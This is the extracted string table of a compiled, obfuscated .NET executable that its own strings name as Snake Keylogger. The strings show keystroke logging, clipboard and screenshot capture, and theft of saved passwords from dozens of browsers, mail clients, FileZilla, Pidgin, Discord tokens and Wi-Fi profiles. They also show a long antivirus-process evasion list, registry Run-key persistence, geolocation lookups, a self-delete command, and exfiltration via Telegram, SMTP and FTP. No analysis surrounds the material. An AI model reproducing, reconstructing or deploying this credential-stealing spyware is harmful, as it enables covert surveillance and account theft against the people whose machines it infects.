!This program cannot be run in DOS mode.
`.rsrc
@.reloc
KDBM(
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
v4.0.30319
#Strings
_Lambda$__22-0
$I119-0
_Lambda$__119-0
__StaticArrayInitTypeSize=10
__StaticArrayInitTypeSize=11
IEnumerable`1
Collection`1
ThreadSafeObjectProvider`1
List`1
__StaticArrayInitTypeSize=32
kernel32
Microsoft.Win32
user32
UInt32
ToInt32
ToUInt64
ToInt64
DLLFunctionDelegate4
DLLFunctionDelegate5
ToUInt16
SHA256
DLLFunctionDelegate6
get_UTF8
GetModuleFileNameA
SetWindowsHookExA
DATA_BLOB
get_ASCII
lfwhUWZlmFnGhDYPudAJ
get_URL
set_URL
get_formSubmitURL
set_formSubmitURL
BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
BCRYPT_OAEP_PADDING_INFO
BCRYPT_PSS_PADDING_INFO
System.IO
TripleDES
CRYPTPROTECT_PROMPT_ON_UNPROTECT
CRYPTPROTECT_PROMPT_ON_PROTECT
CRYPTPROTECT_PROMPTSTRUCT
BCRYPT_KEY_LENGTHS_STRUCT
set_IV
MoveFileExW
_Closure$__
Dispose__Instance__
Create__Instance__
value__
cbData
pbData
UploadData
ProtectedData
GetClipboardData
cbAuthData
pbAuthData
SECItemData
ProjectData
CryptUnprotectData
aaalogshsindgdaLogndta
mscorlib
System.Collections.Generic
Microsoft.VisualBasic
KeyboardProc
ThreadId
pszAlgId
GetWindowThreadProcessId
get_nextId
set_nextId
OpenRead
Thread
get_timePasswordChanged
set_timePasswordChanged
Interlocked
get_timesUsed
set_timesUsed
get_timeLastUsed
set_timeLastUsed
get_IsDisposed
get_timeCreated
set_timeCreated
m_FormBeingCreated
Synchronized
get_id
set_id
row_id
get_guid
set_guid
Wekakekakd
get_passwordField
set_passwordField
get_usernameField
set_usernameField
record_header_field
ReadToEnd
Append
RegistryValueKind
set_Method
TargetMethod
get_Clipboard
CloseClipboard
OpenClipboard
get_Keyboard
get_Password
set_Password
get_encryptedPassword
set_encryptedPassword
_password
Replace
CreateInstance
get_GetInstance
instance
cbNonce
pbNonce
VKCode
GetHashCode
set_Mode
FileMode
PaddingMode
OpenMode
CipherMode
XmlNode
get_Unicode
get_BigEndianUnicode
VKCodeToUnicode
FromImage
get_Message
MailMessage
AddRange
CompareExchange
CredentialCache
EndInvoke
BeginInvoke
GetEnvironmentVariable
IsClipboardFormatAvailable
IDisposable
Hashtable
Double
GCHandle
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
Rectangle
Console
set_WindowStyle
ProcessWindowStyle
get_Name
set_FileName
get_MachineName
GetElementsByTagName
get_OSFullName
get_FullName
get_appName
set_appName
get_UserName
set_UserName
get_ProcessName
GetProcessesByName
astable_name
item_name
get_encryptedUsername
set_encryptedUsername
_username
get_hostname
set_hostname
DateAndTime
DateTime
ReadLine
WriteLine
Combine
LocalMachine
DataProtectionScope
get_encType
set_encType
ChangeType
GCHandleType
ValueType
SecurityProtocolType
SECItemType
GetType
item_type
OpenShare
Compare
get_InvariantCulture
Capture
ConsoleApplicationBase
ApplicationSettingsBase
get_Response
WebResponse
GetResponse
FileClose
Dispose
StrReverse
Create
DLLFunctionDelegate
MulticastDelegate
KeyDelegate
DelegateAsyncState
GetKeyboardState
DebuggerBrowsableState
EditorBrowsableState
Delete
ThreadStaticAttribute
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
HelpKeywordAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
StandardModuleAttribute
HideModuleNameAttribute
ObsoleteAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
MyGroupCollectionAttribute
AssemblyDescriptionAttribute
UnmanagedFunctionPointerAttribute
FlagsAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
AccessedThroughPropertyAttribute
set_UseShellExecute
get_Value
m_ThreadStaticValue
get_StringValue
_stringValue
GetObjectValue
GetValue
SetValue
AutoPropertyValue
set_Expect100Continue
Remove
lfwhUWZlmFnGhDYPudAJ.exe
cbSize
get_TotalSize
Deserialize
Initialize
SuppressFinalize
SizeOf
get_ItemOf
LastIndexOf
System.Threading
set_Padding
NewLateBinding
UTF8Encoding
get_Encoding
GetEncoding
InitializeCaptionLogging
System.Runtime.Versioning
FromBase64String
ToBase64String
GetResourceString
CompareString
ToString
GetString
Substring
System.Drawing
ComputeHash
get_ExecutablePath
GetFolderPath
get_Width
get_Length
dwMinLength
set_ContentLength
dwMaxLength
EndsWith
PtrToStringUni
AsyncCallback
DelegateCallback
_hookCallback
add_Tick
remove_Tick
GlobalLock
get_CapsLock
TransformFinalBlock
GlobalUnlock
UnHook
SetHook
CallNextHook
AllocHGlobal
FreeHGlobal
Marshal
NetworkCredential
Decimal
ConditionalCompareObjectEqual
set_Interval
cbLabel
pbLabel
System.Collections.ObjectModel
System.ComponentModel
System.Net.Mail
LateCall
kernel32.dll
user32.dll
Crypt32.dll
ntdll.dll
bcrypt.dll
System.Xml
set_SecurityProtocol
Control
get_url
set_url
set_EnableSsl
FileStream
GetResponseStream
GetRequestStream
MemoryStream
TSECItem
get_Item
get_FileSystem
SymmetricAlgorithm
HashAlgorithm
get_httprealm
set_httprealm
Random
set_From
ICryptoTransform
root_num
Boolean
SECItemLen
get_Screen
CopyFromScreen
FileOpen
System.ComponentModel.Design
get_OSVersion
dwInfoVersion
get_version
set_version
Conversion
Application
System.Configuration
System.Globalization
System.Web.Script.Serialization
Interaction
System.Reflection
MatchCollection
GroupCollection
WebHeaderCollection
MailAddressCollection
AttachmentCollection
direction
set_Position
CallingConvention
WebException
CryptographicException
TargetInvocationException
InvalidOperationException
get_InnerException
Environ
add_KeyDown
remove_KeyDown
get_ShiftKeyDown
get_To
CompareTo
get_Info
FileInfo
CultureInfo
DriveInfo
FileSystemInfo
ComputerInfo
get_StartInfo
ProcessStartInfo
DirectoryInfo
add_KeyUp
remove_KeyUp
Bitmap
hwndApp
ToChar
StringReader
StreamReader
MD5CryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
StringBuilder
SpecialFolder
sender
Buffer
ResourceManager
ServicePointManager
ToInteger
KeyLogger
KeyLoggerEventArgsEventHandler
System.CodeDom.Compiler
ToUpper
CurrentUser
GetDelegateForFunctionPointer
BitConverter
ServerComputer
ToLower
JavaScriptSerializer
configdir
get_StandardError
set_RedirectStandardError
CreateProjectError
ClearProjectError
SetProjectError
IEnumerator
GetEnumerator
Activator
.cctor
CreateDecryptor
CreateEncryptor
IntPtr
Graphics
System.Diagnostics
get_Bounds
Microsoft.VisualBasic.Devices
MyWebServices
Microsoft.VisualBasic.ApplicationServices
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
Microsoft.VisualBasic.MyServices
System.Resources
lfwhUWZlmFnGhDYPudAJ.Resources.resources
DebuggingModes
Matches
get_SpecialDirectories
GetDirectories
GetFiles
GetSubKeyNames
GetProcesses
ReadAllBytes
GetBytes
GetDrives
CryptProtectPromptFlags
dwPromptFlags
dwFlags
Strings
KeyLoggerEventArgs
get_Ticks
ICredentials
set_Credentials
get_DefaultNetworkCredentials
ReferenceEquals
System.Windows.Forms
MyForms
Contains
FFLogins
get_logins
set_logins
System.Web.Extensions
Conversions
System.Text.RegularExpressions
System.Collections
RegexOptions
get_Groups
get_Chars
get_Headers
RuntimeHelpers
Operators
OpenAccess
get_Success
ExitProcess
GetCurrentProcess
GetProcAddress
MailAddress
get_Attachments
get_MyDocuments
set_Arguments
Exists
get_disabledHosts
set_disabledHosts
RemoveAt
Concat
Format
Subtract
ParseExact
AddObject
AddrOfPinnedObject
ConcatenateObject
SubtractObject
TargetObject
set_Subject
Unprotect
FileGet
LateGet
System.Net
PadRight
get_Height
op_Explicit
WaitForExit
cbSalt
get_Default
IAsyncResult
DelegateAsyncResult
result
WebClient
SmtpClient
XmlElement
dwIncrement
sql_statement
Attachment
Environment
XmlDocument
Component
get_Parent
GetParent
get_Current
content
KeyDownEvent
KeyUpEvent
get_Count
RecoveredApplicationAccount
arenaOpt
outItemOpt
szPrompt
BCryptDecrypt
BCryptEncrypt
ThreadStart
Insert
Convert
set_Port
FtpWebRequest
HttpWebRequest
XmlNodeList
ICredentialsByHost
GetKeyboardLayout
set_RedirectStandardInput
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
ReadAllText
get_InnerText
GetText
GetWindowText
cbMacContext
pbMacContext
get_Now
GetForegroundWindow
set_CreateNoWindow
get_CurrentWindow
_currentWindow
_newWindow
ToUnicodeEx
UnhookWindowsHookEx
CallNextHookEx
LateSetComplex
get_TimeOfDay
get_Today
InitializeArray
ToArray
CopyArray
get_IsReady
set_Body
get_Key
set_Key
OpenSubKey
MapVirtualKey
ContainsKey
ProcessKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
Identifykey
System.Security.Cryptography
get_Assembly
Multiply
BlockCopy
LoadLibrary
FreeLibrary
get_TotalPhysicalMemory
CreateDirectory
table_entry
sqlite_master_entry
Registry
op_Equality
op_Inequality
System.Security
BCryptGetProperty
BCryptSetProperty
set_Proxy
IWebProxy
GetSystemWebProxy
ClipboardProxy
FileSystemProxy
SpecialDirectoriesProxy
WrapNonExceptionThrows
YFGGCVyufgtwfyuTGFWTVFAUYVF
Copyright
2021
$256d2426-b4cc-4996-9a99-c8e915357eef
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
MyTemplate
11.0.0.0
My.Computer
My.Application
My.User
My.Forms
My.WebServices
System.Windows.Forms.Form
Create__Instance__
Dispose__Instance__
My.MyProject.Forms
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
3System.Resources.Tools.StronglyTypedResourceBuilder
17.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
17.5.0.0
My.Settings
KPPlogS
Scrlogtimerrr
Clpreptimerr
clprEPs
kLLTIm
TPSSends
UnProtectionTPSSends
ProHfutimer
BPlease refactor calling code to use normal Visual Basic assignment
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC Manifest Options
If you want to change the Windows User Account Control level replace the
requestedExecutionLevel node with one of the following.
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Specifying requestedExecutionLevel element will disable file and registry virtualization.
Remove this element if your application requires this virtualization for backwards
compatibility.
-->
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on and is
is designed to work with. Uncomment the appropriate elements and Windows will
automatically selected the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
! " $#%#&#'#(#,+-+.+
WinForms_RecursiveFormCreate
WinForms_SeeInnerException
lfwhUWZlmFnGhDYPudAJ.Resources
2024-08-07
$%TelegramDv$
$$HASH##
$CheckFile$
$CheckText$
$#TheHashHere%&
$ProtectPass%
ProtectFalse
BsrOkyiChvpfhAkipZAxnnChkMGkLnAiZhGMyrnJfULiDGkfTkrTELinhfkLkJrkDExMvkEUCxUkUGr
PC Name:
Date and Time:
Client IP:
Country Name:
CountryCode:
Region Name:
Region Code:
City:
TimeZone:
Latitude:
Longitude:
Stub Version:
Yx74dJ0TP3M=
oA33xj/Ju3QbYV5pkSQqE6rLMmeozD2Y2fElWwr42xgMlu1BQ293EQCRQmwcQDnm
BKZLkLdBzpZ7o++ZilHEZw==
ZyiAEnXWZP
$waitingforstatus$
$waitingforempty$
chrome
firefox
zlclient
bdagent
npfmsg
olydbg
anubis
wireshark
avastui
_Avp32
keyscrambler
_Avpcc
Ackwin32
Outpost
Anti-Trojan
ANTIVIR
Apvxdwin
ATRACK
Autodown
Avconsol
Avgctrl
Avkserv
Avpdos32
Avptc32
Avpupd
Avsched32
AVSYNMGR
Avwin95
Avwupd32
Blackd
Blackice
Cfiadmin
Cfiaudit
Cfinet
Cfinet32
Claw95
Claw95cf
Cleaner
Cleaner3
Defwatch
Dvp95_0
Ecengine
Espwatch
F-Agnt95
Findviru
F-Prot
F-Prot95
Fp-Win
F-Stopw
Iamapp
Iamserv
Ibmasn
Ibmavsp
Icload95
Icloadnt
Icsupp95
Icsuppnt
Iomon98
Lockdown2000
Lookout
MCAFEE
Moolive
Mpftray
N32scanw
NAVAPSVC
NAVAPW32
NAVLU32
NAVRUNR
Navw32
Navwnt
NeoWatch
NISSERV
Normist
NORTON
Nupgrade
Padmin
Pavsched
PCCIOMON
PCCMAIN
Pccwin98
Pcfwallicon
Persfw
POP3TRAP
PVIEW95
Rav7win
Rescue
Safeweb
Scan32
Scan95
Scanpm
Scrscan
Serv95
SMCSERVICE
Sphinx
Sweep95
SYMPROXYSVC
Tbscan
Tds2-98
Tds2-Nt
TermiNET
Vettray
Vscan40
Vsecomr
Vshwin32
Vsstat
Webscanx
WEBTRAP
Wfindv32
Zonealarm
LOCKDOWN2000
RESCUE32
LUCOMSERVER
avgamsvr
avgupsvc
avgcc32
avgserv
avgserv9
avgserv9schedapp
avgemc
ashwebsv
ashdisp
ashmaisv
ashserv
aswUpdSv
symwsc
norton
Norton Auto-Protect
norton_av
nortonav
ccsetmgr
ccevtmgr
avadmin
avcenter
avguard
avnotify
avscan
guardgui
nod32krn
nod32kui
clamscan
clamTray
clamWin
freshclam
oladdin
sigtool
w9xpopen
Wclose
cmgrdian
alogserv
mcshield
vshwin32
avconsol
vsstat
avsynmgr
avconfig
licmgr
preupd
MsMpEng
MSASCui
Avira.Systray
/C choice /C Y /N /D Y /T 3 & Del "
cmd.exe
software\microsoft\windows\currentversion\run
------------------------
Content-Type
multipart/form-data; boundary=
Content-Disposition: form-data; name="document"; filename="{1}"
Content-Type: {2}
--{0}--
nnrCOnrJyiwsACMwnkEJB
/sendMessage?chat_id=
&text=
{0:f2} GB
user-agent
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
http://checkip.dyndns.org/
<html><head><title>Current IP Check</title></head><body>
</body></html>
Current IP Address:
https://reallyfreegeoip.org/xml/
CountryName
{Null}
RegionCode
RegionName
TimeZone
CountryCode
Latitude
Longitude
Clipboard |
| Snake
--------------------------------------------------
<http>
%FTPDV$
Create
- Clipboard Logs ID -
$%SMTPDV$
$CheckTextEnabled$
Pc Name:
| Snake Tracker
$CheckFileEnabled$
Clipboard
text/plain
JyxTBTUpBksniyThhJvAC
&caption=
| Snake Tracker
Clipboard |
| Snake
QEknLJAwBvLDvEBGMDiAZ
Screenshot
\SnakeKeylogger
\SnakeKeylogger\
- Screenshot Logs ID -
Screenshot |
| Snake Tracker
Screenshot |
--------------------------------------------------
- keystroke Logs ID -
Keystrokes
Keylogger |
| Snake Tracker
Keylogger |
SnakeKeylogger
vXLTtNPZK+Dfb+Yg9FV+EW1xYmFoLa7V
zMaRPCbE0Gb4k/zB6ZNS3r1L34TENqMZD9RW6hkhoOE=
9uzQZ8M9esiGktQ2p1awgW2VefNvdHItyTIJRslztZk=
[ -- {0} -- ]
--------------------------------------------------
- Passwords ID -
Passwords
| Snake Tracker
SnakePW
EnabledAntiBot
89.208.29.130
69.55.5.249
141.226.236.91
3.23.155.57
BotDetected
$BotClean$
EnabledEmpty
NoData!
$FullywithData$
ProtectTrue
yyyy-MM-dd
[ENTR]
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
BCrypt.BCryptDecrypt() (get size) failed with status code: {0}
BCrypt.BCryptDecrypt(): authentication tag mismatch
BCrypt.BCryptDecrypt() failed with status code:{0}
BCrypt.BCryptOpenAlgorithmProvider() failed with status code:{0}
BCrypt.BCryptSetAlgorithmProperty(BCrypt.BCRYPT_CHAINING_MODE, BCrypt.BCRYPT_CHAIN_MODE_GCM) failed with status code:{0}
BCrypt.BCryptImportKey() failed with status code:{0}
BCrypt.BCryptGetProperty() (get size) failed with status code:{0}
BCrypt.BCryptGetProperty() failed with status code:{0}
-------- Snake Tracker --------
Found From: Outlook
E-Mail:
PSWD:
---------------------------------
IMAP Password
POP3 Password
HTTP Password
SMTP Password
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
GetBytes
SMTP Server
Nothing
Outlook
Foxmail
SOFTWARE\Classes\Foxmail.url.mailto\Shell\open\command
Foxmail.exe
Storage\
\Accounts\Account.rec0
Account
POP3Account
Password
POP3Password
-------- Snake Tracker --------
Found From: Foxmail
E-Mail: {0}
PSWD: {0}
\Local State
"encrypted_key":"(.*?)"
\Kinza\User Data\Default\Login Data
logins
origin_url
username_value
password_value
-------- Snake Tracker --------
Found From: Kinza
Host:
\Sputnik\Sputnik\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Sputnik
Host:
-------- Snake Tracker --------
Found From: Falkon
Host:
\MapleStudio\ChromePlus\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: CoolNovo
Host:
\QIP Surf\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: QIP Surf
Host:
\BlackHawk\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Black Hawk
Host:
\7Star\7Star\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: 7Star
Host:
APPDATA
\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
-------- Snake Tracker --------
Found From: Sleipnir
Host:
\CatalinaGroup\Citrio\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Citrio
Host:
\Google\Chrome SxS\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Chrome Canary
Host:
\Google\Chrome\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Google Chrome
Host:
\Coowon\Coowon\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Coowon
Host:
\CocCoc\Browser\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: CocCoc
Host:
\uCozMedia\Uran\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Uran
Host:
\Tencent\QQBrowser\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: QQ
Host:
\Orbitum\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Orbitum
Host:
\Slimjet\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Slimjet
Host:
\Iridium\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Iridium
Host:
\Vivaldi\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Vivaldi
Host:
\Chromium\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Iron
Host:
-------- Snake Tracker --------
Found From: Chromium
Host:
\GhostBrowser\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Ghost
Host:
\CentBrowser\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Cent
Host:
\Xvast\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: xVast
Host:
\Chedot\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Chedot
Host:
\SuperBird\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Superbird
Host:
\360Browser\Browser\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: 360
Host:
\360Chrome\Chrome\User Data\Default\Login Data
\Comodo\Dragon\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Comodo
Host:
\BraveSoftware\Brave-Browser\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Brave
Host:
\Torch\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Torch
Host:
\UCBrowser\User Data_i18n\Default\UC Login Data.18
wow_logins
-------- Snake Tracker --------
Found From: UC
Host:
\Blisk\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Blisk
Host:
\Epic Privacy Browser\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Epic
Host:
\Nichrome\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Nichrome
Host:
\Amigo\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Amigo
Host:
\Kometa\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Kometa
Host:
\Xpom\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Xpom
Host:
\Microsoft\Edge\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Edge Chromium
Host:
ataD nigoL\elbatS arepO\erawtfoS arepO\
tad.dnaw\eliforp\arepO\arepO\
ReadTable
snigol
GetRowCount
GetValue
lru_nigiro
eulav_emanresu
eulav_drowssap
-------- Snake Tracker --------
Found From: Opera
Host:
abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
\FileZilla\recentservers.xml
-------- Snake Tracker --------
Found From: FileZilla
Host:
Username:
Password:
Port:
---------------------------------
AppData
\.purple\accounts.xml
protocol
password
-------- Snake Tracker --------
Found From: Pidgin
Protocol:
\Liebao7\User Data\Default\EncryptedStorage
entries
-------- Snake Tracker --------
Found From: Liebao
Host:
\AVAST Software\Browser\User Data\Default\Login Data
-------- Snake Tracker --------
Found From: Avast
Host:
Software\Microsoft\Windows NT\CurrentVersion
DigitalProductID
BCDFGHJKMPQRTVWXY2346789
All User Profile * : (?<after>.*)
{0}{1}{2}{3}{4}
-------- Snake Tracker --------
Found From: Connected Wifi
WiFi Name:
Password:
wlan show profile name="
" key=clear
wlan show profile
Key Content * : (?<after>.*)
Open Network
\discord\Local Storage\leveldb\
-------- Snake Tracker --------
Found From: Discord
Token:
---------------------------------
UNIQUE
Mozilla\Firefox\Profiles
logins.json
-------- Snake Tracker --------
Found From: Firefox
Host:
Waterfox\Profiles
-------- Snake Tracker --------
Found From: WaterFox
Host:
Thunderbird\Profiles\
-------- Snake Tracker --------
Found From: Thunderbird
Host:
Mozilla\SeaMonkey\Profiles
-------- Snake Tracker --------
Found From: SeaMonkey
Host:
Comodo\IceDragon\Profiles
-------- Snake Tracker --------
Found From: Ice Dragon
Host:
8pecxstudios\Cyberfox\Profiles
-------- Snake Tracker --------
Found From: CyberFox
Host:
FlashPeak\SlimBrowser\Profiles
-------- Snake Tracker --------
Found From: Slim
Host:
PostboxApp\Profiles
-------- Snake Tracker --------
Found From: PostBox
Host:
Moonchild Productions\Pale Moon\Profiles
-------- Snake Tracker --------
Found From: PaleMoon
Host:
NSS_Shutdown
PROGRAMFILES
\Mozilla Thunderbird\
\Mozilla Firefox\
\SeaMonkey\
\Comodo\IceDragon\
\Cyberfox\
\Pale Moon\
\Waterfox Current\
\SlimBrowser\
\Postbox\
\mozglue.dll
\nss3.dll
NSS_Init
PK11SDR_Decrypt
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
YFGGCVyufgtwfyuTGFWTVFAUYVF
FileVersion
1.0.0.0
InternalName
lfwhUWZlmFnGhDYPudAJ.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
lfwhUWZlmFnGhDYPudAJ.exe
ProductName
YFGGCVyufgtwfyuTGFWTVFAUYVF
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0